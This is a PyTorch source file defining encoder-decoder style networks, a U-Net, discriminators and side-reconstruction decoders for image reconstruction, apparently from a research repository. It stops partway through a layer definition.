|
2022-03-30T11:31:28.000Z
|
2022-03-30T11:31:28.000Z
|
model.py
|
klanita/sigoat
|
941552227639edf38e9b5b745848160ae83f451a
|
[
"MIT"
] | null | null | null |
model.py
|
klanita/sigoat
|
941552227639edf38e9b5b745848160ae83f451a
|
[
"MIT"
] | null | null | null |
import torch
import torch.utils.data
from torch import nn, optim
from torch.nn import functional as F
from torchvision import datasets, transforms
class StyleNetworkImage(nn.Module):
def __init__(self, inplanes=1, planes=16,
kernel_size=4, stride=2, padding=1,
normalization='instance'):
super(StyleNetworkImage, self).__init__()
if normalization == 'instance':
norm_layer=nn.InstanceNorm2d
else:
norm_layer=nn.BatchNorm2d
self.latent_dim = 1024*2*2
output_padding = (0, 0)
encoder = []
x = inplanes
y = planes
for i in range(7):
encoder += [
nn.Conv2d(x, y, kernel_size, stride, padding),
norm_layer(y),
nn.LeakyReLU(0.2)]
x = y
y = y*2
encoder += [nn.Flatten()]
self.encoder = nn.Sequential(*encoder)
x = 1024
y = 512
output_padding = (0, 0)
decoder = [nn.Unflatten(1, (x, 2, 2))]
decoder_style = [nn.Unflatten(1, (x, 2, 2))]
for i in range(7):
decoder += [
nn.ConvTranspose2d(x, y, kernel_size, stride, padding,\
output_padding, bias=False),
norm_layer(y),
nn.LeakyReLU(0.2)]
decoder_style += [
nn.ConvTranspose2d(x, y, kernel_size, stride, padding,\
output_padding, bias=False),
norm_layer(y),
nn.LeakyReLU(0.2)]
# if i == 3:
# output_padding = (0, 0)
x = y
y = y//2
decoder += [nn.Conv2d(8, 1, 3, 1, 1)]
self.decoder = nn.Sequential(*decoder)
decoder_style += [nn.Conv2d(8, 1, 3, 1, 1)]
self.decoder_style = nn.Sequential(*decoder_style)
self.mu = nn.Embedding(1, self.latent_dim)
self.logvar = nn.Embedding(1, self.latent_dim)
self.logvar.weight.data[0] = torch.zeros(
[1, self.latent_dim], requires_grad=False)
def forward(self, imgs, real=False):
z_s = self.encode(imgs)
return self.decode(z_s, real=real)
def encode(self, imgs):
return self.encoder(imgs)
def encode_with_style(self, imgs, real=False):
if real:
return self.encoder(imgs) + self.sample(z_s.shape)
else:
return self.encoder(imgs)
def sample(self, s):
std = torch.exp(self.logvar.weight[0].expand(s))
eps = torch.randn_like(std)
return eps * std + self.mu.weight[0].expand(s)
def decode(self, z_s, real=False):
if real:
return self.decoder_style(z_s + self.sample(z_s.shape))
else:
return self.decoder(z_s)
class unet_block(nn.Module):
def __init__(self,
in_channels,
out_channels,
inner_block=None,
kernel_size=4,
stride=2,
padding=1,
output_padding=(0, 0),
outermost=False,
innermost=False,
norm_layer=nn.InstanceNorm2d):
super().__init__()
self.outermost = outermost
if inner_block is None:
down_block = nn.Sequential(
nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding=(1, 0)),
norm_layer(out_channels),
nn.LeakyReLU(0.2)
)
else:
down_block = nn.Sequential(
nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding),
norm_layer(out_channels),
nn.LeakyReLU(0.2)
)
if outermost:
in_channels = 16
up_block = nn.Sequential(
nn.ConvTranspose2d(out_channels, in_channels, kernel_size, stride, padding,\
output_padding, bias=False),
norm_layer(in_channels),
nn.LeakyReLU(0.2))
else:
up_block = nn.Sequential(
nn.ConvTranspose2d(out_channels, int(in_channels), kernel_size, stride, padding,\
output_padding, bias=False),
norm_layer(in_channels),
nn.LeakyReLU(0.2))
blocks_list = [down_block]
if not (inner_block is None):
blocks_list += [inner_block]
blocks_list += [up_block]
if outermost:
blocks_list += [nn.Conv2d(16, 1, 3, 1, 1)]
self.model = nn.Sequential(*blocks_list)
def forward(self, x):
return self.model(x)
class UNet(nn.Module):
def __init__(self, norm_layer=nn.InstanceNorm2d):
super(UNet, self).__init__()
l1 = unet_block(256, 512, norm_layer=norm_layer, output_padding=(1, 0),
inner_block=None, innermost=True, outermost=False) #inner block
l2 = unet_block(128, 256, norm_layer=norm_layer, output_padding=(1, 0),
inner_block=l1, innermost=False, outermost=False)
l3 = unet_block(64, 128, norm_layer=norm_layer, output_padding=(1, 0),
inner_block=l2, innermost=False, outermost=False)
l4 = unet_block(32, 64, norm_layer=norm_layer, output_padding=(1, 0),
inner_block=l3, innermost=False, outermost=False)
l5 = unet_block(16, 32, norm_layer=norm_layer, output_padding=(0, 0),
inner_block=l4, innermost=False, outermost=False)
self.model = unet_block(1, 16, norm_layer=norm_layer, output_padding=(0, 0),
inner_block=l5, innermost=False, outermost=True)
def forward(self, img):
return self.model(img)
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
nn.init.normal_(m.weight.data, 0.0, 0.02)
elif classname.find('BatchNorm') != -1:
nn.init.normal_(m.weight.data, 1.0, 0.02)
nn.init.constant_(m.bias.data, 0)
# Number of channels in the training images. For color images this is 3
nc = 3
# Size of z latent vector (i.e. size of generator input)
nz = 7168
# Size of feature maps in generator
ngf = 64
# Size of feature maps in discriminator
ndf = 64
class StyleNetwork(nn.Module):
def __init__(
self, img_size, inplanes=1, planes=16,
kernel_size=4, stride=2, padding=1,
normalization='instance'
):
super(StyleNetwork, self).__init__()
if normalization == 'instance':
norm_layer=nn.InstanceNorm2d
elif normalization == 'bacth':
norm_layer=nn.BatchNorm2d
else:
raise NotImplementedError
if (img_size == 'linear') or (img_size == -1):
# means we run on the whole image
latent=14
output_padding=(1, 0)
dim2 = 2
elif img_size == 'multi':
latent=14
output_padding=(1, 0)
dim2 = 4
else:
# means we run on a crop of the image
output_padding=(0, 0)
latent=2
self.latent_dim = 512*latent*dim2
encoder = []
x = inplanes
y = planes
for i in range(6):
encoder += [
nn.Conv2d(x, y, kernel_size, stride, padding),
norm_layer(y),
nn.LeakyReLU(0.2)]
if x == 1:
x = 16
else:
x = x*2
y = y*2
encoder += [nn.Flatten()]
self.encoder = nn.Sequential(*encoder)
x = 512
y = 256
decoder = [nn.Unflatten(1, (x, latent, dim2))]
decoder_style = [nn.Unflatten(1, (x, latent, dim2))]
for i in range(6):
decoder += [
nn.ConvTranspose2d(x, y, kernel_size, stride, padding,\
output_padding, bias=False),
norm_layer(y),
nn.LeakyReLU(0.2)]
decoder_style += [
nn.ConvTranspose2d(x, y, kernel_size, stride, padding,\
output_padding, bias=False),
norm_layer(y),
nn.LeakyReLU(0.2)]
if i == 3:
output_padding = (0, 0)
x = x//2
if y != 16:
y = y//2
decoder += [nn.Conv2d(16, 1, 3, 1, 1)]
self.decoder = nn.Sequential(*decoder)
decoder_style += [nn.Conv2d(16, 1, 3, 1, 1)]
self.decoder_style = nn.Sequential(*decoder_style)
self.mu = nn.Embedding(1, self.latent_dim)
self.logvar = nn.Embedding(1, self.latent_dim)
self.logvar.weight.data[0] = torch.zeros(
[1, self.latent_dim], requires_grad=False)
def forward(self, imgs, real=False):
z_s = self.encode(imgs)
return self.decode(z_s, real=real)
def encode(self, imgs):
return self.encoder(imgs)
def encode_with_style(self, imgs, real=False):
if real:
return self.encoder(imgs) + self.sample(z_s.shape)
else:
return self.encoder(imgs)
def sample(self, s):
std = torch.exp(self.logvar.weight[0].expand(s))
eps = torch.randn_like(std)
return eps * std + self.mu.weight[0].expand(s)
def decode(self, z_s, real=False):
if real:
return self.decoder_style(z_s + self.sample(z_s.shape))
else:
return self.decoder(z_s)
class DiscriminatorLatent(nn.Module):
def __init__(self, latent_dim):
super().__init__()
self.latent_dim = latent_dim
# TODO change to flexible architecture
self.linears = nn.Sequential(
# nn.Linear(latent_dim, n_classes),
nn.Linear(latent_dim, 1000),
nn.BatchNorm1d(1000), #remove if needed
nn.LeakyReLU(0.2),
nn.Linear(1000, 500),
nn.LeakyReLU(0.2),
nn.Linear(500, 1),
nn.Sigmoid()
)
def forward(self, z):
return self.linears(z)
class Discriminator(nn.Module):
def __init__(self, img_size=-1, inplanes=1, planes=16, kernel_size=4, stride=2, padding=1,
norm_layer=nn.InstanceNorm2d, patch=True):
super(Discriminator, self).__init__()
if img_size == -1:
# means we run on the whole image
latent=14
else:
latent=2
self.latent_dim = 256*latent
main = []
in_channels = inplanes
out_channels = planes
for i in range(7):
main += [
nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding),
norm_layer(out_channels),
nn.LeakyReLU(0.2),
nn.Dropout(0.5)]
if in_channels == 1:
in_channels = 16
else:
in_channels = in_channels*2
if out_channels != 512:
out_channels = out_channels*2
if patch:
main += [nn.Flatten(), nn.Sigmoid()]
else:
main += [nn.Flatten(), nn.Linear(self.latent_dim, 1), nn.Sigmoid()]
self.main = nn.Sequential(*main)
def forward(self, input):
return self.main(input)
class DiscriminatorSides(nn.Module):
def __init__(self, inplanes=1, planes=16, kernel_size=4, stride=2, padding=1,
norm_layer=nn.InstanceNorm2d):
super(DiscriminatorSides, self).__init__()
self.main = nn.Sequential(
nn.Conv2d(1, 16, 4, 2, 1),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 32, 4, 2, 1),
nn.InstanceNorm2d(32),
nn.LeakyReLU(0.2),
nn.Conv2d(32, 64, 4, 2, 1),
nn.InstanceNorm2d(64),
nn.LeakyReLU(0.2),
nn.Conv2d(64, 128, 4, 2, 1),
nn.InstanceNorm2d(128),
nn.LeakyReLU(0.2),
nn.Conv2d(128, 256, 4, 2, 1),
nn.InstanceNorm2d(256),
nn.LeakyReLU(0.2),
nn.Conv2d(256, 512, 4, 2, 1), # 512-14-4
nn.InstanceNorm2d(512),
nn.LeakyReLU(0.2),
nn.Sigmoid())
def forward(self, input):
return self.main(input)
class SidesReconstruction(nn.Module):
# def __init__(self, latent_dim=14336, n_label=2):
def __init__(self, latent_dim=14336, img_size=-1, inplanes=1, planes=16,
kernel_size=4, stride=2, padding=1,
norm_layer=nn.InstanceNorm2d):
super().__init__()
self.latent_dim = latent_dim
self.encoder = nn.Sequential(
nn.Conv2d(1, 16, 4, 2, 1),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 32, 4, 2, 1),
nn.InstanceNorm2d(32),
nn.LeakyReLU(0.2),
nn.Conv2d(32, 64, 4, 2, 1),
nn.InstanceNorm2d(64),
nn.LeakyReLU(0.2),
nn.Conv2d(64, 128, 4, 2, 1),
nn.InstanceNorm2d(128),
nn.LeakyReLU(0.2),
nn.Conv2d(128, 256, 4, 2, 1),
nn.InstanceNorm2d(256),
nn.LeakyReLU(0.2),
# nn.Conv2d(256, 512, 4, 2, (1, 0)), # 512-14-4
# nn.InstanceNorm2d(512),
# nn.LeakyReLU(0.2),
# nn.Conv2d(512, 512, 4, 2, 1), # 512-14-4
# nn.InstanceNorm2d(512),
# nn.LeakyReLU(0.2),
)
self.sides_head_center = nn.Sequential(
nn.Conv2d(256, 512, 4, 2, 1), # 512-14-4
nn.InstanceNorm2d(512),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(256),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
self.sides_head_left = nn.Sequential(
nn.Conv2d(256, 512, 4, 2, (1, 0)), # 512-14-4
nn.InstanceNorm2d(512),
nn.LeakyReLU(0.2),
# nn.Flatten(),
# nn.Linear(latent_dim, 7168),
# nn.LeakyReLU(0.2),
# nn.Unflatten(1, (512, 14, 1)),
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(256),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
self.sides_head_right = nn.Sequential(
nn.Conv2d(256, 512, 4, 2, (1, 0)), # 512-14-4
nn.InstanceNorm2d(512),
nn.LeakyReLU(0.2),
# nn.Flatten(),
# nn.Linear(latent_dim, 7168),
# nn.LeakyReLU(0.2),
# nn.Unflatten(1, (512, 14, 1)),
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(256),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
def forward(self, imgs):
z_s = self.encoder(imgs)
reconsts_center = self.decode(z_s, sides='center').clone().detach()
reconsts_left = self.decode(z_s, sides='left').clone().detach()
reconsts_right = self.decode(z_s, sides='right').clone().detach()
reconsts = torch.cat((reconsts_left, reconsts_center, reconsts_right), 3)
return reconsts
def encode(self, imgs):
z_s = self.encoder(imgs)
return z_s
def decode(self, z_s, sides='center'):
if sides == 'right':
reconsts = self.sides_head_right(z_s)
elif sides == 'left':
reconsts = self.sides_head_left(z_s)
elif sides == 'center':
reconsts = self.sides_head_center(z_s)
else:
raise NotImplementedError
return reconsts
class SidesDecoder(nn.Module):
# def __init__(self, latent_dim=14336, n_label=2):
def __init__(self, latent_dim=14336, img_size=-1, inplanes=1, planes=16,
kernel_size=4, stride=2, padding=1,
norm_layer=nn.InstanceNorm2d):
super().__init__()
self.latent_dim = latent_dim
self.sides_head_left = nn.Sequential(
nn.Flatten(),
nn.Linear(latent_dim, 7168),
nn.LeakyReLU(0.2),
nn.Unflatten(1, (512, 14, 1)),
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(256),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
self.sides_head_right = nn.Sequential(
nn.Flatten(),
nn.Linear(latent_dim, 7168),
nn.LeakyReLU(0.2),
nn.Unflatten(1, (512, 14, 1)),
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(256),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
def forward(self, imgs):
z_s = self.encoder(imgs)
reconsts_center = self.decode(z_s, sides='center').clone().detach()
reconsts_left = self.decode(z_s, sides='left').clone().detach()
reconsts_right = self.decode(z_s, sides='right').clone().detach()
reconsts = torch.cat((reconsts_left, reconsts_center, reconsts_right), 3)
return reconsts
def decode(self, z_s, sides):
if sides == 'right':
reconsts = self.sides_head_right(z_s)
elif sides == 'left':
reconsts = self.sides_head_left(z_s)
else:
raise NotImplementedError
return reconsts
class FaderNetwork(nn.Module):
def __init__(
self,
latent_dim=14336,
n_label=2,
normalization='batch'):
super().__init__()
self.latent_dim = latent_dim
if normalization == 'instance':
norm_layer=nn.InstanceNorm2d
else:
norm_layer=nn.BatchNorm2d
self.encoder = nn.Sequential(
nn.Conv2d(1, 16, 4, 2, 1),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 32, 4, 2, 1),
norm_layer(32),
nn.LeakyReLU(0.2),
nn.Conv2d(32, 64, 4, 2, 1),
norm_layer(64),
nn.LeakyReLU(0.2),
nn.Conv2d(64, 128, 4, 2, 1),
norm_layer(128),
nn.LeakyReLU(0.2),
nn.Conv2d(128, 256, 4, 2, 1),
norm_layer(256),
nn.LeakyReLU(0.2),
nn.Conv2d(256, 512, 4, 2, 1), # 512-14-4
norm_layer(512),
nn.LeakyReLU(0.2),
)
self.sides_head_center = nn.Sequential(
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(256),
# nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
self.sides_head_left = nn.Sequential(
nn.Flatten(),
nn.Linear(latent_dim, 7168),
# nn.LeakyReLU(0.2),
nn.Unflatten(1, (512, 14, 1)),
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(256),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
self.sides_head_right = nn.Sequential(
nn.Flatten(),
nn.Linear(latent_dim, 7168),
# nn.LeakyReLU(0.2),
nn.Unflatten(1, (512, 14, 1)),
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(256),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
# self.lt = nn.Embedding(n_label, latent_dim)
def forward(self, imgs):
z_s = self.encoder(imgs)
reconsts_center = self.decode(z_s, sides='center')
reconsts_left = self.decode(z_s, sides='left')
reconsts_right = self.decode(z_s, sides='right')
reconsts = torch.cat((reconsts_left, reconsts_center, reconsts_right), 3)
return reconsts
def encode(self, imgs):
z_s = self.encoder(imgs)
return z_s
def decode(self, z_s, sides='center'):
if sides == 'right':
reconsts = self.sides_head_right(z_s)
elif sides == 'left':
reconsts = self.sides_head_left(z_s)
elif sides == 'center':
reconsts = self.sides_head_center(z_s)
else:
raise NotImplementedError
return reconsts
class ReconstructionNetwork(nn.Module):
def __init__(self, inplanes=1, planes=16,
kernel_size=4, stride=2, padding=1,
norm_layer=nn.InstanceNorm2d):
super(ReconstructionNetwork, self).__init__()
latent=14
output_padding=(1, 0)
self.latent_dim = 512*latent*2
encoder = []
x = inplanes
y = planes
for i in range(6):
encoder += [
nn.Conv2d(x, y, kernel_size, stride, padding),
norm_layer(y),
nn.LeakyReLU(0.2)]
if x == 1:
x = 16
else:
x = x*2
y = y*2
# encoder += [nn.Flatten()] + [nn.Linear(self.latent_dim, self.latent_dim*4)]
self.encoder = nn.Sequential(*encoder)
x = 512
y = 256
# decoder = [nn.Unflatten(1, (x, latent, 8))]
decoder = []
for i in range(6):
decoder += [
nn.ConvTranspose2d(x, y, kernel_size, stride, padding,\
output_padding, bias=False),
norm_layer(y),
nn.LeakyReLU(0.2)]
if i == 3:
output_padding = (0, 0)
x = x//2
if y != 16:
y = y//2
decoder += [nn.Conv2d(16, 1, 3, 1, 1)]
self.decoder = nn.Sequential(*decoder)
def forward(self, imgs):
z = self.encoder(imgs)
return self.decoder(z)
class StyleNetworkAblation(nn.Module):
def __init__(
self,
img_size,
inplanes=1,
planes=16,
kernel_size=4,
stride=2,
padding=1,
normalization='instance',
output_padding=(1, 0),
n_layers=6
):
if normalization == 'instance':
norm_layer=nn.InstanceNorm2d
else:
norm_layer=nn.BatchNorm2d
super(StyleNetworkAblation, self).__init__()
if n_layers == 6:
latent=14
if (img_size == 'linear'):
dim2 = 2
elif img_size == 'multi':
dim2 = 4
else:
raise NotImplementedError
else:
latent=7
if (img_size == 'linear'):
dim2 = 1
elif img_size == 'multi':
dim2 = 2
else:
raise NotImplementedError
self.latent_dim = 512*latent*dim2
encoder = []
x = inplanes
y = planes
for i in range(n_layers):
if i == 6:
encoder += [
nn.Conv2d(x, y, kernel_size, stride, padding),
norm_layer(y),
nn.LeakyReLU(0.2)]
else:
encoder += [
nn.Conv2d(x, y, kernel_size, stride, (1, 1)),
norm_layer(y),
nn.LeakyReLU(0.2)]
x = y
y = y*2
encoder += [nn.Flatten()]
self.encoder = nn.Sequential(*encoder)
if n_layers == 6:
x = 512
y = 256
else:
x = 1024
y = 512
decoder = [nn.Unflatten(1, (x, latent, dim2))]
decoder_style = [nn.Unflatten(1, (x, latent, dim2))]
for i in range(n_layers):
if i == 4:
output_padding = (0, 0)
decoder += [
nn.ConvTranspose2d(
x, y, kernel_size, stride, padding,\
output_padding, bias=False
),
norm_layer(y),
nn.LeakyReLU(0.2)]
decoder_style += [
nn.ConvTranspose2d(
x, y, kernel_size, stride, padding,\
output_padding, bias=False
),
norm_layer(y),
nn.LeakyReLU(0.2)
]
x = x//2
if y != 16:
y = y//2
decoder += [nn.Conv2d(16, 1, 3, 1, (1, 1))]
self.decoder = nn.Sequential(*decoder)
decoder_style += [nn.Conv2d(16, 1, 3, 1, 1)]
self.decoder_style = nn.Sequential(*decoder_style)
self.mu = nn.Embedding(1, self.latent_dim)
self.logvar = nn.Embedding(1, self.latent_dim)
self.logvar.weight.data[0] = torch.zeros(
[1, self.latent_dim], requires_grad=False)
def forward(self, imgs, real=False):
z_s = self.encode(imgs)
return self.decode(z_s, real=real)
def encode(self, imgs):
return self.encoder(imgs)
def encode_with_style(self, imgs, real=False):
if real:
return self.encoder(imgs) + self.sample(z_s.shape)
else:
return self.encoder(imgs)
def sample(self, s):
std = torch.exp(self.logvar.weight[0].expand(s))
eps = torch.randn_like(std)
return eps * std + self.mu.weight[0].expand(s)
def decode(self, z_s, real=False):
if real:
return self.decoder_style(z_s + self.sample(z_s.shape))
else:
return self.decoder(z_s)
class FullNetwork(nn.Module):
def __init__(
self,
img_size,
inplanes=1,
planes=16,
kernel_size=4,
stride=2,
padding=1,
normalization='instance',
output_padding=(1, 0),
n_layers=6
):
if normalization == 'instance':
norm_layer=nn.InstanceNorm2d
else:
norm_layer=nn.BatchNorm2d
super(FullNetwork, self).__init__()
if n_layers == 6:
latent=14
if (img_size == 'linear'):
dim2 = 2
elif img_size == 'multi':
dim2 = 4
else:
latent=7
if (img_size == 'linear'):
dim2 = 1
elif img_size == 'multi':
dim2 = 2
self.latent_dim = 512*latent*dim2
encoder = []
x = inplanes
y = planes
for i in range(n_layers):
if i == 6:
encoder += [
nn.Conv2d(x, y, kernel_size, stride, padding),
norm_layer(y),
nn.LeakyReLU(0.2)]
else:
encoder += [
nn.Conv2d(x, y, kernel_size, stride, (1, 1)),
norm_layer(y),
nn.LeakyReLU(0.2)]
x = y
y = y*2
encoder += [nn.Flatten()]
self.encoder = nn.Sequential(*encoder)
if n_layers == 6:
x = 512
y = 256
else:
x = 1024
y = 512
decoder = [nn.Unflatten(1, (x, latent, dim2))]
decoder_style = [nn.Unflatten(1, (x, latent, dim2))]
for i in range(n_layers):
if i == 4:
output_padding = (0, 0)
decoder += [
nn.ConvTranspose2d(
x, y, kernel_size, stride, padding,\
output_padding, bias=False
),
norm_layer(y),
nn.LeakyReLU(0.2)]
decoder_style += [
nn.ConvTranspose2d(
x, y, kernel_size, stride, padding,\
output_padding, bias=False
),
norm_layer(y),
nn.LeakyReLU(0.2)
]
x = x//2
if y != 16:
y = y//2
decoder += [nn.Conv2d(16, 1, 3, 1, (1, 1))]
self.decoder = nn.Sequential(*decoder)
decoder_style += [nn.Conv2d(16, 1, 3, 1, 1)]
self.decoder_style = nn.Sequential(*decoder_style)
self.mu = nn.Embedding(1, self.latent_dim)
self.logvar = nn.Embedding(1, self.latent_dim)
self.logvar.weight.data[0] = torch.zeros(
[1, self.latent_dim], requires_grad=False)
self.sides_head_left = nn.Sequential(
nn.Flatten(),
nn.Linear(self.latent_dim, 7168),
nn.LeakyReLU(0.2),
nn.Unflatten(1, (512, 14, 1)),
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(256),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
self.sides_head_right = nn.Sequential(
nn.Flatten(),
nn.Linear(self.latent_dim, 7168),
nn.LeakyReLU(0.2),
nn.Unflatten(1, (512, 14, 1)),
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(256),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
